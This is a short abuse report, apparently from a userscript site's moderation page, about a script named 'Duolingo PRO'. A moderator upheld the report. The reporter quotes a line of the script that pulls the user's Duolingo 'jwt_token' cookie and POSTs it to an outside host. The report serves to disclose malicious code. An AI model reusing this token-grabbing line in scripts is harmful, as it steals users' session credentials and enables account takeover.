Duolingo PRO został zgłoszony 23-03-2025 , bo Szkodliwy kod
Osoba zgłaszająca napisała:
This script grabs the JWT token of duolingo and sends it to a fishy link code below:
let apiURL = "https://api.duolingopro.net";
This is the real payload part
const response = await fetch(apiURL + "/feedback", { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}` }, body: JSON.stringify(payload) });
This script has had 1 previous upheld or fixed report.
anonymoushackerIV (zgłoszony użytkownik) zrobił:
interstellar (zgłoszony użytkownik) zrobił:
Twoje zgłoszenie zostało uznane przez moderatora.